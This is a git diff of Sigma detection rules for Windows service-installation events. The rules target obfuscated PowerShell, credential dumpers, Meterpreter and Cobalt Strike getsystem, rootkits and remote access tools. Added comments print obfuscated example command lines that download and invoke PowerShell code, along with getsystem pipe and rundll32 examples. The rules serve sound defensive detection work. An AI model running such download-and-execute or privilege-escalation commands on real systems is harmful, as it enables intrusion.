PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2023/02/20 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml index fa7fe4e0d..7bef91030 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml @@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - System id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the code block linked in the references +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -20,13 +19,13 @@ detection: selection_eid: EventID: 7045 selection_imagepath: - - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ImagePath|re: \\*mdr\*\W\s*\)\.Name - - ImagePath|re: \$VerbosePreference\.ToString\( - - ImagePath|re: \String\]\s*\$VerbosePreference + - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ImagePath|re: \\*mdr\*\W\s*\)\.Name + - ImagePath|re: \$VerbosePreference\.ToString\( + - ImagePath|re: \String\]\s*\$VerbosePreference condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml index 21c5357e1..4ea5a7bea 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml @@ -3,7 +3,7 @@ id: 72862bf2-0eb1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -21,6 +21,9 @@ detection: selection_main: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -" + # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )" ImagePath|contains|all: - cmd - powershell @@ -28,10 +31,10 @@ detection: - /c - /r selection_other: - - ImagePath|contains: noexit - - ImagePath|contains|all: - - input - - $ + - ImagePath|contains: noexit + - ImagePath|contains|all: + - input + - $ condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml index c80f1d928..85e5b9a18 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml @@ -3,7 +3,7 @@ id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -21,6 +21,9 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " ImagePath|contains|all: - cmd - '"set' diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml index 33fcd8eb6..daaa7b44b 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml @@ -3,7 +3,7 @@ id: 175997c5-803c-4b08-8bb0-70b099f47595 status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml index 46b318ed4..d1a5aad22 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml @@ -3,7 +3,7 @@ id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml index 700bb6d03..b2164ce6a 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml @@ -3,7 +3,7 @@ id: 487c7524-f892-4054-b263-8a0ace63fc25 status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 @@ -21,6 +21,7 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' ImagePath|contains|all: - set - '&&' diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml index 09870974d..2ddf87ec4 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml @@ -3,7 +3,7 @@ id: 63e3365d-4824-42d8-8b82-e56810fefa0c status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml index 6d31edde2..5bfb23151 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml @@ -3,7 +3,7 @@ id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml index 559c08305..9341d4795 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml @@ -3,7 +3,7 @@ id: 641a4bfb-c017-44f7-800c-2aee0184ce9b status: test description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 diff --git a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml index 2d9843c70..b1e5f1a38 100644 --- a/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml +++ b/sigma/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml @@ -3,7 +3,7 @@ id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/29 @@ -21,6 +21,9 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 + # ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" ImagePath|contains|all: - '&&set' - cmd diff --git a/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml b/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml index 82a6821d0..8c3639671 100644 --- a/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml +++ b/sigma/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml @@ -1,9 +1,7 @@ title: KrbRelayUp Service Installation id: e97d9903-53b2-41fc-8cb9-889ed4093e80 status: test -description: Detects service creation from KrbRelayUp tool used for privilege escalation - in Windows domain environments where LDAP signing is not enforced (the default - settings) +description: Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings) references: - https://github.com/Dec0ne/KrbRelayUp author: Sittikorn S, Tim Shelton diff --git a/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml b/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml index 8007f2a4b..4d5823199 100644 --- a/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml +++ b/sigma/builtin/system/service_control_manager/win_system_mal_creddumper.yml @@ -1,12 +1,10 @@ title: Credential Dumping Tools Service Execution - System id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed status: test -description: Detects well-known credential dumping tools execution via service execution - events +description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/11/29 tags: diff --git a/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 0ca73ac59..3c068303a 100644 --- a/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/sigma/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -1,8 +1,7 @@ title: Meterpreter or Cobalt Strike Getsystem Service Installation - System id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service installation +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -23,6 +22,9 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_cli_cmd: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a ImagePath|contains|all: - /c - echo @@ -31,12 +33,13 @@ detection: - cmd - '%COMSPEC%' selection_cli_rundll: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn ImagePath|contains|all: - rundll32 - .dll,a - '/p:' selection_cli_share: - ImagePath|startswith: \\\\127.0.0.1\\ADMIN$\ + ImagePath|startswith: \\\\127.0.0.1\\ADMIN$\ # https://twitter.com/svch0st/status/1413688851877416960?lang=en condition: system and (selection_id and 1 of selection_cli_*) falsepositives: - Unlikely diff --git a/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml b/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml index 8602a000b..100c2459f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml +++ b/sigma/builtin/system/service_control_manager/win_system_moriya_rootkit.yml @@ -1,8 +1,7 @@ title: Moriya Rootkit - System id: 25b9c01c-350d-4b95-bed1-836d04a4f324 status: test -description: Detects the use of Moriya rootkit as described in the securelist's Operation - TunnelSnake report +description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report references: - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 author: Bhabesh Raj diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml index e14223a28..7603c2ef5 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_anydesk.yml @@ -1,8 +1,7 @@ title: Anydesk Remote Access Software Service Installation id: 530a6faa-ff3d-4022-b315-50828e77eef5 status: test -description: Detects the installation of the anydesk software service. Which could - be an indication of anydesk abuse if you the software isn't already used. +description: Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used. references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml index 8461744c9..f9f9b545f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml @@ -19,10 +19,11 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: csexecsvc - - ImagePath|endswith: \csexecsvc.exe + - ServiceName: csexecsvc + - ImagePath|endswith: \csexecsvc.exe condition: system and (all of selection_*) falsepositives: - Unknown level: medium + ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml index 571d3b2d6..b5ad3489b 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_hacktools.yml @@ -33,7 +33,7 @@ detection: - WCESERVICE - winexesvc selection_service_image: - ImagePath|contains: bypass + ImagePath|contains: bypass # https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82#file-scmuacbypass-cpp-L159 condition: system and (selection_eid and 1 of selection_service_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml index 1f8667033..1428a25ea 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml @@ -1,8 +1,7 @@ title: Mesh Agent Service Installation id: e0d1ad53-c7eb-48ec-a87a-72393cc6cedc status: test -description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely - manage computers +description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: MeshAgent.exe - - ServiceName|contains: Mesh Agent + - ImagePath|contains: MeshAgent.exe + - ServiceName|contains: Mesh Agent condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml index 9e0fb1e01..ded3cd867 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml @@ -12,14 +12,22 @@ logsource: product: windows service: system detection: + # Example: + # + # Client32 + # "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* * + # user mode service + # auto start + # LocalSystem + # system: Channel: System selection_root: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: \NetSupport Manager\client32.exe - - ServiceName: Client32 + - ImagePath|contains: \NetSupport Manager\client32.exe + - ServiceName: Client32 condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml index 076f11909..a2b13454a 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_paexec.yml @@ -19,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_image: - - ServiceName|startswith: PAExec- - - ImagePath|startswith: C:\WINDOWS\PAExec- + - ServiceName|startswith: PAExec- + - ImagePath|startswith: C:\WINDOWS\PAExec- condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml index 75c1eaf05..d118e5f87 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml @@ -1,13 +1,9 @@ title: New PDQDeploy Service - Server Side id: ee9ca27c-9bd7-4cee-9b01-6e906be7cae3 status: test -description: 'Detects a PDQDeploy service installation which indicates that PDQDeploy - was installed on the machines. - - PDQDeploy can be abused by attackers to remotely install packages or execute commands - on target machines - - ' +description: | + Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. + PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm author: Nasreddine Bencherchali (Nextron Systems) @@ -25,10 +21,10 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: PDQDeployService.exe - - ServiceName: - - PDQDeploy - - PDQ Deploy + - ImagePath|contains: PDQDeployService.exe + - ServiceName: + - PDQDeploy + - PDQ Deploy condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml index a505141de..a6d72a249 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml @@ -1,13 +1,9 @@ title: New PDQDeploy Service - Client Side id: b98a10af-1e1e-44a7-bab2-4cc026917648 status: test -description: 'Detects PDQDeploy service installation on the target system. - - When a package is deployed via PDQDeploy it installs a remote service on the target - machine with the name "PDQDeployRunner-X" where "X" is an integer starting from - 1 - - ' +description: | + Detects PDQDeploy service installation on the target system. + When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1 references: - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm author: Nasreddine Bencherchali (Nextron Systems) @@ -25,8 +21,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: PDQDeployRunner- - - ServiceName|startswith: PDQDeployRunner- + - ImagePath|contains: PDQDeployRunner- + - ServiceName|startswith: PDQDeployRunner- condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml index 0c053a067..5b8346d7c 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml @@ -1,8 +1,7 @@ title: ProcessHacker Privilege Elevation id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9 status: test -description: Detects a ProcessHacker tool that elevated privileges to a very high - level +description: Detects a ProcessHacker tool that elevated privileges to a very high level references: - https://twitter.com/1kwpeter/status/1397816101455765504 author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml index 3deb9f9ff..2b784c050 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remcom.yml @@ -19,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: RemComSvc - - ImagePath|endswith: \RemComSvc.exe + - ServiceName: RemComSvc + - ImagePath|endswith: \RemComSvc.exe condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml index 6ab4ff9b3..f87c475b0 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml @@ -1,11 +1,10 @@ title: Remote Access Tool Services Have Been Installed - System id: 1a31b18a-f00c-4061-9900-f735b96c99fc related: - - id: c8b00925-926c-47e3-beea-298fd563728e - type: similar + - id: c8b00925-926c-47e3-beea-298fd563728e + type: similar status: experimental -description: Detects service installation of different remote access tools software. - These software are often abused by threat actors to perform +description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform references: - https://redcanary.com/blog/misbehaving-rats/ author: Connor Martin, Nasreddine Bencherchali @@ -27,25 +26,26 @@ detection: - 7045 - 7036 ServiceName|contains: - - AmmyyAdmin + # Based on https://github.com/SigmaHQ/sigma/pull/2841 + - AmmyyAdmin # https://www.ammyy.com/en/ - Atera - - BASupportExpressSrvcUpdater - - BASupportExpressStandaloneService + - BASupportExpressSrvcUpdater # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html + - BASupportExpressStandaloneService # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html - chromoting - - GoToAssist - - GoToMyPC + - GoToAssist # https://www.goto.com/it-management/resolve + - GoToMyPC # https://get.gotomypc.com/ - jumpcloud - - LMIGuardianSvc - - LogMeIn + - LMIGuardianSvc # https://www.logmein.com/ + - LogMeIn # https://www.logmein.com/ - monblanking - Parsec - - RManService - - RPCPerformanceService - - RPCService - - SplashtopRemoteService + - RManService # https://www.systemlookup.com/O23/7855-rutserv_exe.html + - RPCPerformanceService # https://www.remotepc.com/ + - RPCService # https://www.remotepc.com/ + - SplashtopRemoteService # https://www.splashtop.com/ - SSUService - TeamViewer - - TightVNC + - TightVNC # https://www.tightvnc.com/ - vncserver - Zoho condition: system and selection diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml index ed2182729..48155d811 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml @@ -12,16 +12,24 @@ logsource: product: windows service: system detection: + # Example: + # + # Remote Utilities - Host + # "C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe" -service + # user mode service + # auto start + # LocalSystem + # system: Channel: System selection_root: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains|all: - - \rutserv.exe - - -service - - ServiceName: Remote Utilities - Host + - ImagePath|contains|all: + - \rutserv.exe + - -service + - ServiceName: Remote Utilities - Host condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml index 2e3af507f..59f03cf11 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sliver.yml @@ -1,8 +1,7 @@ title: Sliver C2 Default Service Installation id: 31c51af6-e7aa-4da7-84d4-8f32cc580af2 status: test -description: Detects known malicious service installation that appear in cases in - which a Sliver implants execute the PsExec commands +description: Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml 